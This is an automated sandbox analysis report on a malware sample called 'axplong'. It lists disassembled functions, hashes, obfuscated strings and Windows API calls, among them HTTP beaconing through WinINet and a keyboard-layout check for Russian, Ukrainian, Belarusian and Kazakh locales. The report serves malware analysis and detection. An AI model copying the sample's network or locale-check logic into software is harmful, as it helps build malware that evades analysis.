Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GVQsgL==$IVKsgL==$RBPleCSm
API String ID: 1484870144-3856690409
Opcode ID: ac855dfd442558028c9b22178a8618797e427e9d1102a7a5a55801f458329e73
Instruction ID: 598d1f13babc3d2ce79c34510cdddaab3d221e7e85d21fc78ba95a76c95d4145
Opcode Fuzzy Hash: ac855dfd442558028c9b22178a8618797e427e9d1102a7a5a55801f458329e73
Instruction Fuzzy Hash: 8D919FB190015C9BDB28DF24CC85BEDB7B9EB49304F4045E9E60997282DB709FC98FA4

Function 00BF46C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00BF7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00BF795C
Part of subcall function 00BF7870: __Cnd_destroy_in_situ.LIBCPMT ref: 00BF7968
Part of subcall function 00BF7870: __Mtx_destroy_in_situ.LIBCPMT ref: 00BF7971

Part of subcall function 00BEBD60: InternetOpenW.WININET(00C38D70,00000000,00000000,00000000,00000000), ref: 00BEBDED
Part of subcall function 00BEBD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00BEBE11
Part of subcall function 00BEBD60: HttpOpenRequestA.WININET(?,00000000), ref: 00BEBE5B

std::_Xinvalid_argument.LIBCPMT ref: 00BF4EA2

Strings

96B6, xrefs: 00BF5470
aqB6, xrefs: 00BF54DB
JB6, xrefs: 00BF53F5
9KN6, xrefs: 00BF5351
MJF+, xrefs: 00BF47BD, 00BF48EC, 00BF4ADC, 00BF4C0B
MJB+, xrefs: 00BF4776, 00BF47ED, 00BF4A95, 00BF4B0C
Fz==, xrefs: 00BF369E, 00BF4D2D
9526, xrefs: 00BF531D
V0x6, xrefs: 00BF541E
KFT0PL==, xrefs: 00BF54B9
WJP6, xrefs: 00BF53A3
aZT6, xrefs: 00BF53CC
stoi argument out of range, xrefs: 00BF4269, 00BF4EAC
6F9fr==, xrefs: 00BF4712
8ZF6, xrefs: 00BF5502
246122658369, xrefs: 00BF4F3A, 00BF4F4D, 00BF4F8F, 00BF4F99, 00BF54F4
fed3aa, xrefs: 00BF5489
mP=, xrefs: 00BF6383, 00BF6652
Vp 6, xrefs: 00BF5447
V0N6, xrefs: 00BF537A
5F6, xrefs: 00BF5497

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
API String ID: 2414744145-1662704651
Opcode ID: d7282eb4dcbe4ed427e1357c2a471b598fa6b2de341e7b44e3604a8d7cbc6b95
Instruction ID: 216392243834d0865a0b55976385dc1f6d1d13d25d0467353348033bd0e2c434
Opcode Fuzzy Hash: d7282eb4dcbe4ed427e1357c2a471b598fa6b2de341e7b44e3604a8d7cbc6b95
Instruction Fuzzy Hash: BC232871D0015C8BEB19DB28CD897ADBBB6AF85304F5081D8E509A72D2EB359F88CF51

Function 00BE5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 00BE600A
Keyboard Layout\Preload, xrefs: 00BE5F64
0000043f, xrefs: 00BE603B
00000419, xrefs: 00BE5FA8
00000422, xrefs: 00BE5FD9

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 638bab5f88304f59a7ce805c057702581b3fcb4488b4d6374fcabaa12440dd8b
Instruction ID: 9a5ffda1d641e15632447c35c30557eb7f5e7170a21d2b7601101a199b132f2a
Opcode Fuzzy Hash: 638bab5f88304f59a7ce805c057702581b3fcb4488b4d6374fcabaa12440dd8b
Instruction Fuzzy Hash: 0BE17F7190025CABEB24DFA4CC89BEDB7B9EF14304F5042D9E509A7291DB74ABC88F51

Function 00BE7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BE7EA3

Strings

JmpxRL==, xrefs: 00BE8062
JmpyPb==, xrefs: 00BE810A
JmpxQb==, xrefs: 00BE81B2

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 0f8ac088b58f50d81c2f708f25c42ab5f5dbbfcaa659e9ba2f7ec51f75bb67c9
Instruction ID: 6c1cfa9b6c80050ead769827d89d39bed34a2294087572161aac91196cd0402a
Opcode Fuzzy Hash: 0f8ac088b58f50d81c2f708f25c42ab5f5dbbfcaa659e9ba2f7ec51f75bb67c9
Instruction Fuzzy Hash: 81D1E770E00688ABDF24AF29CC477AD77A1AB46314F9442D8E415A73D2DF354E858BD2

Function 00C16E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00C16E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00C16E7D
__dosmaperr.LIBCMT ref: 00C16F12

Part of subcall function 00C17177: __dosmaperr.LIBCMT ref: 00C171AC

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 8f52c76facf621baa4f5ecb85f50e883538964a7ff2ff7c8df448c82ecf02cd5
Instruction ID: 14dabc025ffb7dd58d0b6de54ff3cc26f6d42eb875cac447b17997a35c595feb
Opcode Fuzzy Hash: 8f52c76facf621baa4f5ecb85f50e883538964a7ff2ff7c8df448c82ecf02cd5
Instruction Fuzzy Hash: 9C412D75900204AADB24DFB5EC41AEFBBF9EF4A300B10452DF956D3610DA31A985EB61

Function 00C1D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb74a7677724ec30d5a713b3c1e11016876d68ccadf7a3e6e5a5281106946e67
Instruction ID: 46dfabb3239a25c93f9dac22575d624b1a9391447f714b6658200da112f056d9
Opcode Fuzzy Hash: eb74a7677724ec30d5a713b3c1e11016876d68ccadf7a3e6e5a5281106946e67
Instruction Fuzzy Hash: 03611572D002148FDF25EFA8D8857EDB7B2AB47315F248516E46BA7290D7309EC0BB91

Function 00BE82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00BE8454

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 74981a6769627491c5d585573d3268102fd580cf6664b10b834a07937be72df2
Instruction ID: b2a3b5324265762efb6529d14673ec036b4ffa12bb14f78f34cdbbcc05d591e1
Opcode Fuzzy Hash: 74981a6769627491c5d585573d3268102fd580cf6664b10b834a07937be72df2
Instruction Fuzzy Hash: 3D514871D006489BEB24EF29CD85BEDB7B5EB45304F5042E8E808A73C1EF355A808B91

Function 00C16C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60d0576d6f35e0d2737785363ace8148142b7b23bf53602f62a4425c98ef60d
Instruction ID: f63f1fbc1c8fdce2fa6112dbdf5d527ca87b9237c8496f756f688cfcc5e94d1d
Opcode Fuzzy Hash: d60d0576d6f35e0d2737785363ace8148142b7b23bf53602f62a4425c98ef60d
Instruction Fuzzy Hash: 2C21F572A052087AEB11BB64AC42FDE77299F43378F214310F9342B1D1DBB09E85B6A1

Function 00C16F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00C16FB3

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: ed63b0287de0b1e87fa9c91690aa14133a9ce783e0f7640654cd4251943e3c5f
Instruction ID: d5f79bd200171f87d1fcba4726e9419775348d0b1bbf4df33959b8c5227c02a9
Opcode Fuzzy Hash: ed63b0287de0b1e87fa9c91690aa14133a9ce783e0f7640654cd4251943e3c5f
Instruction Fuzzy Hash: E4111CB290020CAEDB10DED5D940FEFB7BCAB09310F515266F522E2180EB70EB85DB61

Function 00C1D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00C1A5ED,?,00C174AE,?,00000000,?), ref: 00C1D731

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 258513ecbae843409d4439fc45e2289303e18b8f8892e971bb4648ed60c090cf
Instruction ID: 40c9a373d2710a64da54f8ce40894b322f63bfa5681d9b550c3c273163d9968e
Opcode Fuzzy Hash: 258513ecbae843409d4439fc45e2289303e18b8f8892e971bb4648ed60c090cf
Instruction Fuzzy Hash: F8F0E931605125769F212A235C11BDB7799EF837B0B188111AC179A1C9CF30E9C076E1

Function 00BF6AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00BF6B65

Memory Dump Source

Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_be0000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9d6e29a15a4afb4ce3e1500a7a7a33c322b315cf937b35c85fe7b303a02573a7
Instruction ID: 86ac4d2fdbd7554fcd18749db8d20b128eda9a1d4ac92be5cc5ef04e8c7e035b
Opcode Fuzzy Hash: 9d6e29a15a4afb4ce3e1500a7a7a33c322b315cf937b35c85fe7b303a02573a7
Instruction Fuzzy Hash: C6F0D135E00608ABC710BB799C07B2E7BA4AB07B60F800398F811672E1DB305A0587D2

Function 04F807D8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9a4e1e73026f7a85ae9161decb69940518430a1da1ccfd257f0d541b3b10f0
Instruction ID: e2910453803472aeddaabc812e486cfcdc97bd3e0568f810f3adaf0fec8c7340
Opcode Fuzzy Hash: 4f9a4e1e73026f7a85ae9161decb69940518430a1da1ccfd257f0d541b3b10f0
Instruction Fuzzy Hash: 692106EB24C110BDB24161552B149FA7B6DE7D7330372442FF407CA603EB952A8E7572

Function 04F80768 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac70f3fe0598f45126a4f541bb4d8ebab3518c68646b1986ffd1224b96487698
Instruction ID: e3ca646168b05ff629b07359b8b01befd8f574db5b7520ea0ccb5dbfccdc05af
Opcode Fuzzy Hash: ac70f3fe0598f45126a4f541bb4d8ebab3518c68646b1986ffd1224b96487698
Instruction Fuzzy Hash: 222108EB24C114BD7241A5456B14AFB7B6EE7C77303B2842FF407CAA02EB951A8E3471

Function 04F80771 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd1c7f99e67d1a90f534de218e290732a0d1338d3db48853e5b9b116d8c997df
Instruction ID: 598875a8cf928b092b80a557440a11f466b8a99ef5702f6fec912211a3c4c4f2
Opcode Fuzzy Hash: bd1c7f99e67d1a90f534de218e290732a0d1338d3db48853e5b9b116d8c997df
Instruction Fuzzy Hash: 432108EB24C115BD7141A5456B14AFB676EE7D7730372882FF003CA902EB991A8E3171

Function 04F80759 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68b3f87d8d704ac23cd9b4c1a772815f4b6a14864fb6198c7fdf04c08e316372
Instruction ID: 7b20b7f9a0d2cd28a9021f4a0b533ba3516fff3c2a91aeb2435f0cc69a07d6c1
Opcode Fuzzy Hash: 68b3f87d8d704ac23cd9b4c1a772815f4b6a14864fb6198c7fdf04c08e316372
Instruction Fuzzy Hash: 1A11C3EB24C114BD7142A5456B049FB7A6EE7D7730372842FF407CA602EB942A8E3472

Function 04F807AA Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d26c60c6a8d9ebe2f1c8eae3445d607dbc0ad5c6afb6a82902ca315fd9f5ec75
Instruction ID: bef948a9f911e9f4c52dbea04ee5e7847240b9fd27d94a624c349a76afcded13
Opcode Fuzzy Hash: d26c60c6a8d9ebe2f1c8eae3445d607dbc0ad5c6afb6a82902ca315fd9f5ec75
Instruction Fuzzy Hash: 8C11E7FB24C2147D7101A15567109FB6B6DE6D7730372843FF403CA506E7951A8E6071

Function 04F80795 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

